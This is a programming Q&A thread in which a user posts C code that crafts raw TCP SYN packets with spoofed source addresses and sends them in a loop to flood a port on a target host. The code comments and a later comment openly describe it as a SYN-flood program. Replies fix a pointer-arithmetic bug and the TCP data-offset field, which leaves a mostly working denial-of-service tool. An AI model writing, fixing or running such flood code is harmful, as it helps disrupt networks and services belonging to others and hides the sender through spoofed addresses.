# raw sockets in c - bogus header length

Tags: c, sockets

```
#include<stdlib.h>
#include<netinet/ip.h>
#include<netinet/tcp.h>
#include<sys/socket.h>
#include<arpa/inet.h>
#include<netinet/in.h>  
#include<stdio.h>
#include<unistd.h>
#include<string.h>
#include<sys/types.h>

#define P 5000      /* lets flood the  port */

unsigned short      /* this function generates header checksums */
csum (unsigned short *buf, int nwords)
{
  unsigned long sum;
  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

int 
main (void)
{
    char ipp[10] = "1.2.3.4";
  int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);  /* open raw socket */
  char datagram[4096];  /* this buffer will contain ip header, tcp header,
               and payload. we'll point an ip header structure
               at its beginning, and a tcp header structure after
               that to write the header values into it */
  struct ip *iph = (struct ip *) datagram;
  struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
  struct sockaddr_in sin;
                /* the sockaddr_in containing the dest. address is used
               in sendto() to determine the datagrams path */

  sin.sin_family = AF_INET;
  sin.sin_port = htons (P);/* you byte-order >1byte header values to network
                  byte order (not needed on big endian machines) */
  sin.sin_addr.s_addr = inet_addr ("192.168.1.12");

  memset (datagram, 0, 4096);   /* zero out the buffer */

/* we'll now fill in the ip/tcp header values, see above for explanations */
  iph->ip_hl = 5;
  iph->ip_v = 4;
  iph->ip_tos = 0;
  iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr);    /* no payload */
  iph->ip_id = htonl (54321);   /* the value doesn't matter here */
  iph->ip_off = 0;
  iph->ip_ttl = 255;
  iph->ip_p = 6;
  iph->ip_sum = 0;      /* set it to 0 before computing the actual checksum later */
  iph->ip_src.s_addr = inet_addr (ipp);/* SYN's can be blindly spoofed */
  iph->ip_dst.s_addr = sin.sin_addr.s_addr;


    tcph->source = htons (1234);    /* arbitrary port */
  tcph->dest = htons (P);
  tcph->seq = random ();/* in a SYN packet, the sequence is a random */
  tcph->ack_seq = 0;/* number, and the ack sequence is 0 in the 1st packet */

  tcph->doff = 0;       /* first and only tcp segment */

          tcph->syn = 1;
  tcph->window = htonl (65535); /* maximum allowed window size */
  tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
          should fill in the correct checksum during transmission */
  tcph->urg_ptr = 0;

  iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);

/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
       that the kernel knows the header is included in the data, and doesn't
   insert its own header into the packet before our data */

  {             /* lets do it the ugly way.. */
    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
      printf ("Warning: Cannot set HDRINCL!\n");
  }
int i1=49;
char i2 = 49;
int cc = 0;
int r1;
  while (cc<99)
    {

        ipp[6] = i1;
    ipp[7] = i2;
    if(i1 == 57)
    {
        break;
    }
    if(i2 == 57 )
    {   i2 = 48;
        i1++;
        }


i2++;   
cc++;
        iph->ip_src.s_addr = inet_addr (ipp);
      if (sendto (s,        /* our socket */
          datagram, /* the buffer containing headers and data */
          iph->ip_len,  /* total length of our datagram */
              0,        /* routing flags, normally always 0 */
          (struct sockaddr *) &sin, /* socket addr, just like in */
          sizeof (sin)) < 0)        /* a normal send() */
    printf ("error\n");
      else
    printf ("sent \n");
    }

  return 0;
}
```

the code creates a raw socket with proper ip address and the source addrewss is 192.168.1.12...port 5000 ... the problem is that when i try to capture the packets sent using wireshark, it says something like bogus tcp headee length...should be atleast 20 ... how can i correct this error ...
P.S. you can refer [link](http://mixter.void.ru/rawip.html)     for the code explanation if you find the code lengthy ...

Answer (score 2):

After further reading: change this line

```
struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
```

to this

```
struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
```

In the first case tcph would pointer far beyond iph.

`char *datagram`should be `unsigned char *`too.

Comment: it doesnt seem to have done anything better...now it is not even recognised as a syn message which it was earlier...it is a program to flood a port using syn messages ...

Comment: What is wireshark showing now? You can examine the packet, it should show the structures.

Comment: Finally, if you set ip-options, you must leave space form them before the tcp-header.

Comment: 0000  00 04 00 01 00 06 00 21  5c 17 b0 81 00 00 08 00   .......!         \.......
0010  45 00 00 28 a4 74 00 00  ff 06 51 4e 01 02 03 57   E..(.t.. ..QN...W
0020  c0 a8 01 0c 04 d2 13 88  67 45 8b 6b 00 00 00 00   ........ gE.k....
0030  00 02 00 00 00 00 00 00                            ........

Comment: i figured out the problem...just had to set tcp->doff to 5